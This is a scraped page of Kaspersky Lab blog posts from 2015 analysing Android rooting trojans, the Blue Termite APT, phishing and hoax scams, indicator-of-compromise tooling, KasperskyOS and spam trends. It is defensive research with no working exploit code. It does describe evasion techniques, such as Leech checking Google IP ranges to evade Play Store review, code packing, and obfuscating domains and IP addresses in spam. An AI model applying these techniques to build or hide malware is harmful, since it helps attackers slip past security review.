Malware Alerts

Subscribe to Malware Alerts feed
Online headquarters of Kaspersky Lab security experts.
Updated: 2 hours 26 min ago

Taking root

Thu, 08/27/2015 - 05:54

Since June 2015, we have seen a steady growth in the number of mobile malware attacks that use superuser privileges (root access) on the device to achieve their goals.

Root access is incompatible with the operating system’s security model because it violates the principle that applications should be isolated from each other and from the system. It gives an application using root access a virtually unlimited control of the device, which is completely unacceptable in the case of a malicious application.

Malicious use of superuser privileges is not new in itself: in regions where smartphones are sold with privilege escalation tools preinstalled on them, malware writers have long been using this technique. There are also known cases of Trojans gaining such privileges after the user ‘rooted’ the device, i.e. used vulnerabilities to install applications that give superuser privileges on the phone.

However, the malware described in this post gains root privileges on its own, with the device owner having no idea that there is an application with superuser rights on the phone.

How it works

We analyzed the statistics we had collected from May to August 2015 and identified three main Trojan families that use root privileges without the user’s knowledge: Trojan.AndroidOS.Ztorg, Trojan-Dropper.AndroidOS.Gorpo (which operates in conjunction with Trojan.AndroidOS.Fadeb) and Trojan-Downloader.AndroidOS.Leech. All these mobile malware families can install programs; their functionality is in effect limited to providing the capability to download and install any applications on the phone without the user’s knowledge.

A distinctive feature of these mobile Trojans is that they are packages built into legitimate applications but not in any way connected with these applications’ original purpose. Cybercriminals simply take popular legit apps and add malicious code without affecting the main functionality.

After launching, the Trojan attempts to exploit Android OS vulnerabilities known to it one after another in order to gain superuser privileges. In case of success, a standalone version of the malware is installed in the system application folder (/system/app). It regularly connects to the cybercriminals’ server, waiting for commands to download and install other applications. Since subsequent behavior of the malware varies by family, we discuss each of the families separately below.

Fadeb and Gorpo families

It should first be explained why we say that these two families work in conjunction with each other. An analysis of their code has shown that both malicious programs are based on the same framework, with identical methods for hiding strings used in their code. Functionally, Trojan.AndroidOS.Fadeb is responsible for downloading and installing files, while Trojan-Dropper.AndroidOS.Gorpo obtains escalated privileges on the device and then installs Fadeb in /system/app under the name LauncherXXXX.apk. Older versions of Trojan.AndroidOS.Fadeb worked on a ‘standalone’ basis and depended on the su file, installed either by the manufacturer or by the user, being present on the device.

Trojans from these two families are found on inexpensive smartphones – as packages built into popular applications, such as Twitter, Facebook, various launchers, etc. An analysis of infected devices’ firmware has shown that applications that include malicious code are not supplied by the phone manufacturer. The users themselves did not install these applications in standard ways, either. We believe that these applications may have been installed by third parties before the devices reached the users. These could be small private shops that try to install as many applications on devices as possible to make customers happy but use unsafe software sources without performing any security scans of the files they download.

We came up with this theory after studying various websites and user forums where users described cases of devices being infected without their knowledge and Trojans being found on newly-purchased devices.

Source: https://www.androidpit.de/xiaomi-mi4-smartphones-werden-teils-mit-trojaner-ausgeliefert

Source: http://www.newegg.com/Product/SingleProductReview.aspx?ReviewID=4337361

Source: http://www.amazon.com/Lenovo-Screen-Android-Qualcomm-Snapdragon/product-reviews/B00SUWBROI

The list of infection sources does not end there: sometimes users themselves downloaded these Trojans from unofficial app stores. According to our statistics, the most popular infected applications were:

  • com.leo.appmaster
  • cn.cleanmaster.mguard
  • com.apusapps.launcher
  • cc.taosha.beautify.easylocker
  • cc.taosha.toolbox.shareit
  • com.twiter.android
  • com.freevideo.entertainment.youtube
  • com.star.android.smartTouch
  • com.top.sex.positions.real.sounds
Leech family

This malware family is the most advanced of those described in this post: some of its versions can bypass dynamic checks performed by Google before applications can appear in the official Google Play Store. Malware from this family can obtain (based on device IP address, using a resource called ipinfo.io) a range of data, including country of registration, address, and domain names matching the IP address. Next, the Trojan checks whether the IP address is in the IP ranges used by Google:

  • 216.58.192.0 – 216.58.223.255
  • 209.85.128.0 – 209.85.255.255
  • 104.132.0.0 – 104.135.255.255
  • 173.194.0.0 – 173.194.255.255
  • 74.125.0.0 – 74.125.255.255

If the IP address is in one of the above ranges, the malware terminates.

The domain names matching the device’s IP address were also checked for the presence of the following strings: “android”, “google” and “1e100″ (a service used by Google internally; its name is the mathematical formula for the number googol). In this way, the Trojan checks whether the infected device is on Google’s corporate network. This is necessary in order to pass the dynamic tests required before an application can be made available in Google Play app store. When Leech detects that it is on the Google network, this means that it is undergoing a check of this kind, so it terminates.

The malware also uses a dynamic code loading technique, which involves downloading all critically important modules and loading them into its context at run time. This makes static analysis of the application difficult. As a result of using all the techniques described above, the Trojan made it to the official Google Play app store as part of an application named “How Old Camera” – a service that attempts to guess people’s ages from their photos.

As we can see, the app appeared on May 22, 2015, at the peak of popularity enjoyed by a similar Microsoft service. At the time it was removed from Google Play (June 10, 2015), its number of registered installations was in the range from 100,000 to 500,000, which is a lot, particularly in view of the danger posed by the app. A package with the Trojan was also embedded in other popular legitimate applications, such as apps for downloading videos from YouTube or for installing live wallpapers.

After successfully gaining superuser privileges, Leech installs another application to /system/app folder, in addition to its own standalone version. It is an app named “com.sync.sms”, which is detected by Kaspersky Lab products as Trojan.AndroidOS.Guerilla.a. This Trojan carries out aggressive advertising campaigns for other applications. The campaigns include displaying advertising in the status bar, in third-party applications, as well as downloading and installing applications (including the ability to download apps from Google Play) and displaying any interactive elements on the device’s screen.

Interactive elements displayed by Trojan.AndroidOS.Guerilla.a

The Guerilla Trojan can also inject its code into system applications in device memory in order to ensure that it will keep getting launched.

Below is a list of applications advertised by the Guerilla Trojan:

  • com.duotui.home
  • com.mobile.indiapp
  • com.polaris.newnews
  • com.uf.lockscreen
  • gamedangian.tienlenmiennam.gamebai
  • com.flipkart.android
  • com.truecaller
  • com.chaatz
  • com.eterno
  • com.machinezone.gow
  • com.moonton.magicrush
  • com.zqkt.hezuobao1
  • com.batterysaverplus
  • com.heisha.candy150706
  • com.lazada.android
  • com.mfree.mp3.music
  • com.mm.artifact
  • com.mzve.mstc.yxjz
  • com.qihoo.security
  • com.schibsted.bomnegocio.androidApp
  • com.uf.flashlight
  • com.baidu.androidstore
  • com.dianxinos.dxbs
  • com.dianxinos.optimizer.duplay
  • com.estrongs.android.pop
  • com.ijinshan.kbatterydoctor_en
  • com.quikr
  • com.star.android.smartTouch
  • com.weixin.gzsj
  • com.wifi.free.superfast
  • com.baidu.browser.inter
  • com.cleanmaster.mguard
  • com.looku.bee2
  • com.specialapps.SecretBox
  • com.voonik.android
  • com.applockv43o003.amb
  • com.apusapps.launcher
  • com.coconuttec.teenpatti.klub
  • com.cool.coolbrowser
  • com.dragon.android.mobomarket
  • com.hcg.cok.gp
  • com.igg.castleclash_fr
  • com.leo.appmaster
  • com.uc.browser.en
  • com.fission.sevennujoom
  • com.then.dayx.hgwe
  • com.wifimap.mapwifi
  • net.lovoo.android

Leech provides access to infected devices not only to Guerilla but to much more dangerous malware, as well. This is why we have decided to write a separate article about this malicious program, in which we are going to describe both this remarkable Trojan and its derivatives.

Ztorg family

On the whole, Trojans belonging to this family have the same functionality as the families described above. The distribution techniques used also match those employed to spread Trojans from the Gorpo (plus Fadeb) and Leech families – malicious code packages are embedded in legitimate applications. The only significant difference is that the latest versions of this malware use a protection technique that enables them to completely hide code from static analysis. The attackers use a protector that replaces the application’s executable file with a dummy, decrypting the original executable file and loading it into the process’s address space when the application is launched. Additionally, string obfuscation is used to make the task of analyzing these files, which is quite complicated as it is, even more difficult.

Ztorg versions that do not use this kind of protection are detected by Kaspersky Lab products as Trojan.AndroidOS.Ztorg.a and versions with protection are detected as Trojan.AndroidOS.Ztorg.b.

Statistics

Data on the activity of the families described above is provided below. Diagrams on the left-hand side are graphs showing the number of newly attacked users over time and the right-hand images are geographical distribution maps.

Trojan-Downloader.AndroidOS.Leech.a

The largest number of infection attempts for the Leech Trojan was recorded in the first half of July, with about 33 thousand users attacked over the two-week period. Attacks peaked on July 9 – over 2,800 potential victims.

Trojan.AndroidOS.Ztorg.a

Trojan.AndroidOS.Ztorg.b

Trojan.AndroidOS.Ztorg.a was quite active in July – an average of more than 1200 users attacked per day. Around the middle of July, its popularity sharply declined, as the malware was replaced with its new modification –Trojan.AndroidOS.Ztorg.b. The Trojan’s protected version was more active and attacked about 1300 users daily in July.

Trojan-Dropper.AndroidOS.Gorpo.a

The activity of Trojan-Dropper.AndroidOS.Gorpo.a rose gradually, starting in early May 2015. However, we recorded two surges – on June 30 and July 16. On these days, the number of users attacked exceeded 1500 and 1800, respectively.

Trojan.AndroidOS.Fadeb.a

Trojan.AndroidOS.Fadeb.a could be regarded as the least successful of the malicious programs described above. Its activity also increased starting in early May, but even in the first half of July, which was its most active period, the number of users attacked did not exceed 1,000 per day.

The majority of users attacked by the Trojans were located in Russia and India, as well as countries of the Middle East. However, tens and even hundreds of infections were recorded in other regions, too.

Conclusion

It is not very common for malicious applications to be able to gain superuser privileges on their own. Such techniques have mainly been used in sophisticated malware designed for targeted attacks. The cases described in this post show that these techniques are becoming more mainstream: run-of-the mill malware increasingly uses similar (if not more advanced) techniques. This creates a dangerous trend. Although the Trojans described above are mostly used for advertising purposes, nothing would prevent them from using their newly-gained superuser privileges to install applications that can do users much more harm than just irritation caused by annoying advertising.

A Phishing Trampoline – embedding redirects in PDF documents

Fri, 08/21/2015 - 03:16

Today I ran into a typical fraud email claiming to come from a U.S. bank but with a twist! Analyzing the attachment, it turns out that there’s no malware inside but instead a new middle step to fool lesser security software.

The original file name is “Swift confirmation .pdf” and it was created using Microsoft Word 2010.

/Author(Unknown)/CreationDate(D:20150814180000-04’00’)/Creator(Microsoft« Word 2010

So, if it is not malware then what’s the catch?

Well, this is a ‘Mediabox’-clickable document file used to redirect victims to a phishing website.

If the victim clicks on ‘View pdf File’ then it first opens a redirector website and then finally makes the jump to a server located in Chile that actually hosts the phishing attempt.


This is an interesting technique that would fool some Anti-Phishing filters based on analysis of the URLs in the  embedded  email messages themselves.

New activity of the Blue Termite APT

Thu, 08/20/2015 - 06:55

Introduction

In October 2014, Kaspersky Lab started to research “Blue Termite”, an Advanced Persistent Threat (APT) targeting Japan. The oldest sample we’ve seen up to now is from November 2013.

This is not the first time the country has been a victim of an APT. However, the attack is different in two respects: unlike other APTs, the main focus of Blue Termite is to attack Japanese organizations; and most of their C2s are located in Japan. One of the top targets is the Japan Pension Service, but the list of targeted industries includes government and government agencies, local governments, public interest groups, universities, banks, financial services, energy, communication, heavy industry, chemical, automotive, electrical, news media, information services sector, health care, real estate, food, semiconductor, robotics, construction, insurance, transportation and so on. Unfortunately, the attack is still active and the number of victims has been increasing.

The following graph shows daily access to some of the known C2s:

You will see a significant increase in the middle of July (marked in orange). The spike resulted from new attack methods that the Blue Termite group employed and that Kaspersky Lab detects. This article introduces the new methods and technical details on how they work.

New method of initial infection

Originally, the main infection vector of the APT was spear-phishing emails. Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit (CVE-2015-5119, the one leaked from The Hacking Team incident).

Several Japanese web sites have been compromised with this method.

Example:

The malicious code inserted into the compromised site points to “faq.html”.

The source code of “faq.html”:

The “faq.html” loads “movie.swf” which contains the exploit. In this way, the malware infects a visitor’s machine when it’s accessed.

The “movie.swf” header is “ZWS”, a flash file compressed using the Lempel-Ziv-Markov chain-Algorithm (LZMA):

The file contains a big data section, marked in blue:

The data includes 12 bytes of header. The encoded data begins at 0x5dca (“\x78\x9c\xec\xb7….”) and is compressed using zlib. After decompression, an executable file (with an “MZ header”) is found.

In addition to the above data, the swf file also has a shellcode in ActionScript (AS):

The function of this shellcode is quite simple: it saves the extracted executable file as “rdws.exe” in the current temp directory, then executes it with WinExec().

The extracted executable file is “emdivi t17″, a new infection vector used by the attackers. We found several kinds of malware that execute as rdws.exe, and emdivi t17 is one of them.

Kaspersky Lab also found some watering hole attacks, including one on a website belonging to a prominent member of the Japanese government. We sent a notification email to the admin and ISP of the affected site but didn’t receive any reply. However, the malicious code was removed after about an hour. The code below filters out any IPs except for the one belonging to the specific Japanese governmental organization.

Interestingly, the script includes IP information with the variable name “TEST”. We suspect this is the attackers’ testing IP, located in Shanghai.

Customized malware according to target

Kaspersky Lab detected the tailored malware, “emdivi t20″. This malware is basically used after the infection by emdivi t17 that serves as a backdoor. Although the versions emdivi t17 and emdivi t20 are from the same emdivi family, the latter is more sophisticated.. For example, let’s look at the backdoor commands they make use of. emdivi t17 has 9 commands; on the other hand, some of emdivi t20 samples have up to 40 commands.

Commands supported by emdivi t17:

command md5 DOABORT d895d96bc3ae51944b29d53d599a2341 DOWNBG 39cd12d51b236befc5f939a552181d73 GETFILE 74a9d3a81b79eec0aa2f849cbc8a7efb GOTO 4b8bb3c94a9676b5f34ace4d7102e5b9 LOADDLL 67ca07ecb95c4055d2687815d0c0f8b9 SETCMD 48bb700b80557ee2e5cf06c90ba6698c SUSPEND ee93a0b023cef18b34ebfee347881c14 UPLOAD 8dff5f89b87ebf91a1ecc1dbed3a6fbb VERSION 021321e8c168ba3ae39ce3a2e7b3ec87

Commands supported by emdivi t20:

command md5 abort 5bb94a1c12413a2e5d14deabab29f2aa cd 6865aeb3a9ed28f9a79ec454b259e5d0 copy 12cba3ee81cf4a793796a51b6327c678 dir 736007832d2167baaae763fd3a3f3cf1 diskls e120a254f254978fc265354a4e79d1d6 doabort 1f6dcc1149b2eef63f6dd4833d5ef0d3 downbg 1e04875a872812e1f431283244b180d2 downbg2 7f3e982a0d9b4aa5303332aaf414d457 download fd456406745d816a45cae554c788e754 download2 b5a4000c99977ce512052d4e8bf737f8 execute ec0cd3cb91fe82b9501f62a528eb07a9 exhide fc236c4ddd3414cee8bd3cbd937461c0 exit f24f62eeb789199b9b2e467df3b1876b exuser 0b5396d6bd0867485ff63067ad9363e7 get b5eda0a74558a342cf659187f06f746f getfile b24ba6d783f2aa471b9472109a5ec0ee getlnk 71574cf393bf901effa0cbc6c37e4ce2 goto de94e676c0358eefea4794f03d6bda4f hash 0800fc577294c34e0b28ad2839435945 head 96e89a298e0a9f469b9ae458d6afae9f hjlnk ebb0149209e008e3f87e26659aa9b173 loaddll 0340b5e3f0d0ea71eeef6ab890270fc0 md 793914c9c583d9d86d0f4ed8c521b0c1 mklnk a3bb50704b87da1858a46455dfb5e470 move 3734a903022249b3010be1897042568e post 42b90196b487c54069097a68fe98ab6f postfile 316713cb9f82ff9ade53712ab1cbf92c postfile2 f15ae485061a10adead43d7f5d5a9889 rd eeec033a2c4d56d7ba16b69358779091 runas d88f585460839dd14ad3354bb0d5353b screen 599eba19aa93a929cb8589f148b8a6c4 setcmd 27dc2525548f8ab10a2532037a9657e0 setlen 846a44d63b02c23bcfee5b4ccaa89d54 suspend 497927fb538c4a1572d3b3a98313cab1 tasklist 6e0ad8e44cff1b5d2901e1c7d166a2a4 type 599dcce2998a6b40b1e38e8c6006cb0a unzip 0a342b59ecdcede0571340b9ed11633f upload 76ee3de97a1b8b903319b7c013d8c877 version 2af72f100c356273d46284f6fd1dfc08 zip adcdbd79a8d84175c229b192aadc02f2

They both store the md5 checksums of backdoor commands.

When analyzing emdivi t20 samples, we found that it is highly targeted in two respects.

Firstly, an emdivi t20 sample contains hardcoded internal proxy information, being encrypted at 0x44e79c:

The decrypted code is “proxy.??????????.co.jp:8080″:

This trick is not new, but it is not widely used. This is because it may reveal its targets, or it is not a generic method and only works in a specific organization. However, similar cases have been observed sometimes in other APTs.

The second aspect is quite interesting. The emdivi family stores important data about itself, including C2, API name, strings for anti-analysis, value of mutexes, as well as the md5 checksum of backdoor commands and the internal proxy information. They are stored in encrypted form, and are decrypted when necessary. Therefore, to analyze an emdivi sample in detail, we need to locate which hex codes are encrypted, and how to decrypt them. In the process of decryption, a unique decryption key is required for each sample.

emdivi t20 has a function to generate a decryption key using Salt1 and Salt2. Salt1 is generated from a magic string (suspected to be a version of emdivi) with certain four digits (suspected to be an ID of the C2).

Example of a magic string:

Part of the emdivi name (“t17″ and “t20″) is taken from this hardcoded magic string.

Salt2 is generated with a large amount of data that is hardcoded:

In most cases, the emdivi family generates a decryption key using Salt1 and Salt2.

In early July 2015, however, Kaspersky Lab found a sample that creates a decryption key with Salt1, Salt2, and Salt3. Salt3 is the security identifier (SID) from a compromised PC.

The flow of decryption key generation (with additional Salt3):

In other words, the sample works only on its target PCs. Without knowing the victim’s SID, the decryption key will not be generated successfully, making it difficult to decrypt important data. This means it’s not possible to analyze the malware in detail.

Fortunately, we were able to analyze those samples. We were able to successfully brute-force the decryption keys from several samples without SIDs.

Summary

From early June, when the cyber-attack on the Japan Pension Service started to be reported widely, various Japanese organizations would have started to deploy protection measures. However, the attackers from Blue Termite, who it seems kept a close eye on them, started to employ new attack methods and successfully expanded their operation. While writing this article, another sample of emdivi t20 has been found. It employs AES in addition to SID tricks, making it difficult to decrypt sensitive data. In order to fight back against this cyber-espionage, Kaspersky Lab will continue its research.

Kaspersky products detect emdivi t17, emdivi t20, and the flash exploits using the verdicts below:

  • Backdoor.Win32.Emdivi.*
  • Backdoor.Win64.Agent.*
  • Exploit.SWF.Agent.*
  • HEUR:Backdoor.Win32.Generic
  • HEUR:Exploit.SWF.Agent.gen
  • HEUR:Trojan.Win32.Generic
  • Trojan-Downloader.Win32.Agent.*
  • Trojan-Dropper.Win32.Agent.*

More information about the Blue Termite targeted attacks is available to Kaspersky Security Intelligence Services customers. Contact: intelreports@kaspersky.com

You’re Paying for Your Starbucks, One Way or the Other

Thu, 08/20/2015 - 03:47

Today, I received this message from a friend living in Mexico via Whatsapp.

According to the message, Starbucks is giving away 500 in local currency credits if you take their survey, so my friend asked me to take a quick look to determine if it’s real.

Sadly for the coffee lovers among us, this is a classic hoax campaign abusing the Starbucks brand. If the victim follows the link from a mobile device, it loads a fake Starbucks survey with some scripts designed to customize the campaign according to the city of origin and its local currency.


So if you live in the U.S. you’re promised $500 USD but if you’re in Argentina then it’s only 500 pesos and so on. Argentinians are clearly getting the worse end of that deal.

If you have the patience to click through the survey, the scammers have the gall to ask you to spread the message to 10 of your contacts in order to redeem your imaginary voucher. This is how this Hoax is spread –by enlisting the help of gullible victims to prey on their friends!

What if the victim uses a desktop browser? There is a script on the aforementioned site, which is actually located in Moldova, that detects the browser’s user agent. If it matches with a desktop version, the script redirects the visitor to the following URL:

hxxp://dpgoo.[***].com/258769f2-6910-4d0b-9db1-4d386c60c9d7

That URL in turn redirects visitors to another website for a Fake (Rogue) Technical Support service meant to scare the victim into providing remote access to their system.


It turns out that Google Hangouts calls to that number are prohibited. My first calling attempt met an automated answer of ‘This number is not in service’. However, on a second attempt with an alternate line I was able to connect to somebody with a foreign accent.

If you’re so inclined, you can listen  to just how nice and attentive the ‘support staff’ is. Note the pauses and emotional inflection behind each scripted scene like ‘My name is…’ and when I revealed that my computer is infected: https://clyp.it/v2gjp3jq

As you can see, this is an all around ‘Hoax-Fraud-Rogue’ scheme with redundancies and low chance of failure. Victims themselves are enlisted to rekindle the campaigns flames by spreading the message to 10 new users. So, first things first, it’s very important to break the cycle, stop bombarding your friends with scams! Next, invite them to have a conversation about how hoaxes work, maybe over a cup of coffee you’ll actually have to pay for.

Indicators of compromise as a way to reduce risk

Wed, 08/19/2015 - 10:56

Infrastructure owners must regularly check their resources for the presence of malicious components. One of the ways in which a resource may become infected is as a result of “zero-day” vulnerability exploitation by cybercriminals. In this case, the developers of security tools used to protect the information system may be as yet unaware of the new threat. At the same time, experts may be investigating incidents related to the new threat. Moreover, some findings of these investigations may already be publicly available.

Such reports have practical value. A typical report on an APT campaign includes the following information:

  • Attack victims and the objectives of cybercriminals;
  • List of victim nodes (IP addresses);
  • Current activity of malicious components and/or cybercriminal groups;
  • Detailed descriptions of tools and malicious components used by the cybercriminals;
  • Description of the command-and-control (C&C) server infrastructure;
  • Indicators of compromise.

Of all the detailed technical information on any given APT, “indicators of compromise” have the greatest practical value for security administrators. This is a set of data that can help an administrator of the corporate IT infrastructure to discover any malicious activity in the system and take appropriate action.

How should information system administrators use this data in practice? This paper is intended to provide an answer to this question.

An indicator of compromise is information on the signs of malicious activity, which is structured in such a way that it can be fed into automated tools designed to check the infrastructure for signs of infection. Although there is no generally accepted format for descriptions of these indicators, several types of structured data are widely used and supported in the industry.

IOC

IOC (indicator of compromise) – a list of threat data (e.g., strings defining file paths or registry keys) which can be used to detect a threat in the infrastructure using automated software-based analysis.

Simple IOC usage scenarios involve searching the system for specific files using a variety of search criteria: MD5 hashes, file names, creation dates, sizes and other attributes. Additionally, memory can be searched for various signs specific to the threat and the Windows registry can be searched for specific records.

This data can be presented in a variety of formats, one example of which is OpenIOC. The different formats enable the data to be imported into different security solutions to provide further processing of the indicators. An administrator can integrate IOCs taken from reports into such security solutions as:

  • Solutions of the Endpoint Security class
  • SIEM
  • IDS/IPS
  • HIDS/HIPS
  • Various incident investigation tools

There are many commercial solutions for working with IOC, but in many cases the capabilities of similar open-source programs are sufficient to check the target system for signs of infection. One example is Loki – an IOC scanner distributed under the GPL license, which can be used to search the target system for various indicators appearing as a result of malicious activity.

To scan the system using the Loki scanner, it is sufficient to unpack the archive containing the utility and add the relevant IOC attributes to the scanner’s knowledge base. The following IOC categories are located in the application’s folder named “signature”:

  • “filename-iocs” – a text file containing lists of file system attributes produced by the activity of various threats;
  • “hash-iocs” – a list of MD5, SHA1 and SHA256 hashes of malicious components that appear in the system after it is infected;
  • “falsepositive-hashes” – a list of exceptions: MD5, SHA1 and SHA256 hashes that are marked as false positives by the scanner when detecting the relevant components.

As an example, consider the report we released after an investigation of the Carbanak APT. Page 36 of the report lists the MD5 hashes of all malware components that may be present in the system as a result of this infection. We can open the scanner’s file named “hash-iocs” and enter a rule for this threat in the following format: <MD5>;<description> .

List of Carbanak APT components’ MD5 hashes in Loki scanner’s “hash-iocs” file

The next step is to create an indicator in the text file named “filename-iocs”, which describes malicious components’ attributes in the file system. The indicator should have the following format:

# COMMENT

# REGULAREXPRESSION;SCORE

IOC for the file system in Loki “filename-iocs” list

After entering the relevant indicators in the scanner’s knowledge base, we can launch a scan of the workstation. This requires launching the “loki.exe” executable file with administrator privileges (otherwise the scanner won’t be able to scan the contents of RAM for attributes) and wait for the scan to complete.

The process of scanning using Loki utility

Upon completing the scan, the application will generate a report and save it in the program’s folder under the name “loki.txt”.

YARA rules

In addition to the various IOC indicators, there are files with the “.yar” extension attached to some reports. These files contain rules for YARA – a tool for identifying and categorizing malicious samples. The so-called YARA rules use a special syntax to describe attributes that indicate the presence of malicious activity in the system. If one of the rules is met, the analyzer returns an infection verdict that includes the relevant details (e.g., the threat’s name).

Loki scanner described above also supports YARA rules, which means that administrators can use .yar files taken from reports to scan the system for the threats described in these reports. This is done by copying a .yar file to the “signature” folder and launching a scan.

However, the official tool created by developers of the YARA project is much better suited to working with YARA rules, because its knowledge base is regularly updated and is much more extensive than the databases of other similar utilities. As a result, scanning provides a more comprehensive view of an information system’s security, with more complete information on the presence of malicious components in the system.

To scan a workstation, it is sufficient to launch the YARA utility with the necessary parameters. For example:

yara32.exe –d md5= <MD5_hash><this_is_yara_rule.yar><dir_for_check>

where “-d” is a parameter used to define external variables. If any matches to any of the rules are detected, the utility will display a notification including the rule name and the component triggering the rule.

Sample notification of a YARA rule match

The administrator can, for example, launch such scans at system startup. This can be done by writing a simple PowerShell script that will launch utilities with the right parameters and, if necessary, schedule it to run on all hosts at logon using the Active Directory: User configuration -> Windows configuration -> Scenarios ->Logon.

STIX and JSON

Structured Threat Information Expression (STIX) is a unified language for recording threat information and importing it into software solutions. Many security solutions can import information in the STIX format (as well as JSON, which is described below) for using that information in the following kinds of infrastructure:

  • SIEM
  • Indicator-based security solutions (such as scanners)
  • Forensic platforms
  • Solutions of the Endpoint Security class, etc.

A STIX report can be imported into IBM QRadar, a popular SIEM solution, using a specially designed python script:

./stix_import.py -f STIXDocument.xml -i 192.168.56.2 -t XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX -r MyReferenceSet

where the “-f” parameter defines the location of a local STIX document, “-i” defines a host with a QRadar console installed on it, and “-t” defines a service token for QRadar.

STIX reports are also supported by the Splunk App for Enterprise Security intelligence platform and can be imported. A STIX file must have a .xml extension to be read and parsed.

It is worth noting that there is a Python utility called openioc-to-stix which can be used to convert OpenIOC format to STIX Indicators, enabling indicators of compromise to be imported as STIX rules into solutions that do not support OpenIOC.

JSON is one of the most popular data presentation formats, which is also often used to format data provided with reports. The use of JSON data depends on the administrator’s needs and on the software solution into which the data is imported. For example, if a JSON file contains IP addresses of command servers to which infected workstations connect, the administrator of the infrastructure protected by the solution can include these IPs in the blacklist of a firewall supporting JSON imports. If the firewall does not support importing data in this format, the administrator can use a parser (a JSON file analyzer) to export the IP list from the file and then import it into the firewall’s blacklist.

Conclusion

“Indicators of compromise” help to use threat data effectively: identify malware and quickly respond to incidents. These indicators are very often included in threat reports, which are often skimmed by readers. Even if a document providing details of a research project does not have a dedicated Indicators of Compromise section, a reader can always extract useful data (information on the attributes found in infected systems) from the text, present the data extracted in any of the formats described above and import it into a security solution.

Our latest researches with indicators of compromise:

Wild Neutron – Economic espionage threat actor returns with new tricks

The Mystery of Duqu 2.0: a sophisticated cyberespionage actor returns

The Great Bank Robbery: the Carbanak APT

Icefog OpenIOC Release

Darkhotel Indicators of Compromise (PDF)

Crouching Yeti — Appendixes (PDF)

What is a secure OS?

Thu, 08/13/2015 - 06:10

After the publication of our article on car hacking we received a number of questions regarding KasperskyOS. People who wrote to us made the valid point that there are several good and reliable operating systems on the market, designed, among other purposes, for the automotive industry. The main argument used to demonstrate the technological superiority of competing solutions was that the principle of security domain isolation is not a new idea and many of the existing systems that are currently in use have numerous additional security features based on the current needs, such as implementations of cryptographic protocols, network filters and protection against network attacks. Some of these systems are even certified to meet various security standards!

All these additional features (including certification) are of course important, but is it this functionality that makes an operating system reliable and secure? To answer this question, we first need to answer another: what is a secure OS? From our viewpoint, a secure operating system should guarantee secure or trusted execution of components that are not secure (programs).

Our concept has two very important aspects. One is obvious: we do not trust third-party software and consider it insecure and unreliable by definition. The other, not-so-obvious aspect: we should trust the operating system and regard kernel functionality as trusted. To increase the level of trust (after all, gentlemen do not always believe each other’s word), the kernel should undergo formal and mathematical verification (the subject of verification would merit a large research paper of its own).

Taking this paradigm as a starting point, we did not just implement a secure architecture based on a trusted kernel, but learned from existing secure OS implementations, as well. The fundamental principles, such as security domain separation and a microkernel are only half the story. Studying other systems and their limitations helps not only to avoid known problems but also to find new ways to implement security properties. As a result, we have developed an OS that, on the one hand, is similar in its operating principles to other operating systems but, on the other hand, has features which help to overcome known limitations and improve the security characteristics of the system on which the OS is running.

As an example of such improvement, I would like to mention interprocess communication (IPC) typification. This technology, the idea of which might seem quite obvious, provides us with low-level control of the data sent in application calls, giving security policies a granularity of control that has never been implemented at this level. Another feature is combining different types of security policies, such as Flow Control and Type Enforcement, in one system. The resulting policy is a mix of stateful and stateless policies, offering the best of both worlds. Naturally, the possibilities of combining policies are not limited to these two types. No commercial operating system can boast this flexibility. This functionality provides tight control of all interprocess communication, which is based not only on the knowledge of the subject and object of communication (who requests and from whom) but also on the knowledge of the high-level context of communication (what is requested, when and what data is transferred).

Other KasperskyOS features include a flexible language for defining security policies and a policy verification system, which makes both creating and debugging policies significantly easier. There are many other things, as well. The uniqueness of our work is supported by US and Russian patents.

As a result, we believe we have developed an operating system which implements the principle of trusted execution of untrusted applications. This was achieved, among other things, by using the principle of security domain separation and control of interprocess communication that is tight and flexible at the same time. This means that in the OS, modules can only interact by following a strictly defined protocol, enabling them to call only allowed functions in a strictly defined sequence. For customers, this means that even if there is a vulnerability in some module that can be exploited by a hacker (and we admit that this may be the case), the OS works in such a way that the hacker will only be able to gain control of the vulnerable module and will not be able to interfere with the operation of other modules, because all communications are controlled.

An operating system can be compared to a shield. All additional built-in security capabilities, including firewalls, secure data transfer protocols, even certification, are rivets on the shield. They certainly add reliability to the whole thing, but they do not define the overall level of protection. What is more important is the architecture, the principles underlying the OS. This determines whether the shield will be made of paper, plywood or steel. Many operating systems have great rivets – but what kind of shield are they attached to?

Spam and phishing in Q2 2015

Thu, 08/13/2015 - 05:55

 Download PDF version

Spam: features of the quarter “Noising” domains

We have already analyzed the situation with regard to the considerable increase in the number of new domain zones as well as mass generation of spammer domains in these zones, specifically those designed to send out illegitimate mass mailings. The further analysis of spam mailings shows that spammers rely not only on a huge number of new domains which they can change even within one thematic mass mailing, but also on the ways they are implemented in the text. For example, in Q1 we registered various cases of “noising” domains in links used to go to spam resources, as well as cases of code obfuscation in the HTML structure of the messages in the mass mailing.

In many mass mailing, spammers used IP addresses of sites, instead of domain names, in links to advertising resources. However they provided modified rather than direct IP addresses, representing them using the octal or hexadecimal numerical system, adding an arbitrary number of zeros to the beginning of the address. This did not change the IP address, but increased the number of possible variants of its representation (variations within one mass mailing); which, as spammers hoped, would help deceive the spam filter. Such alternative methods of representing IP addresses were used by spammers both in direct links and in “noised” redirects.

Spammers also used noised domains. For example, they represented a domain name using both upper and lower case characters (NEEDHosT.niNjA), as well as using several different codes in the HTML structure of the message. They attempted to hide their domains by changing one of the characters in the name of the domain zone for the same from the other code or similar to it. So, for example, it might look like this – domainname.com , domainname.cⓞ

Spammers often applied several methods of noising in one email: they used both the alternative representation of the IP address or domain distortion, as well as the traditional use of meaningless “junk” text in the body of the message, in order to completely conceal the spam theme of the message.

World events in “Nigerian” spam

In the second quarter of 2015, “Nigerian” letters exploited the themes of the earthquake in Nepal, the presidential election in Nigeria and the Olympics in Rio de Janeiro. Tragic events widely covered in the world media are usually exploited by fraudsters to trick users, and their stories hardly change.

In the email written on behalf of a lawyer whose client died in Nepal, the scammers asked the recipient to play the role of the victim’s relative and help in receiving their inheritance, in return for financial remuneration. In the other mass mailings, the fraudsters distributed emails in the name of various organizations asking to help the earthquake victims. For example, “a representative of the Red Cross” asked the recipient to assist in accommodating a family of refugees who had decided to move to another country and invest their funds there.

Generally, the addresses of those who send “Nigerian” letters were registered on free e-mail services, even if the author of the email was a representative of an organization, as in the above case. However, some tricky fraudsters tried to make the name and the address of the sender look more legitimate. They sent out fake messages asking the recipients to make a voluntary donation to help the victims of the earthquake in Nepal.

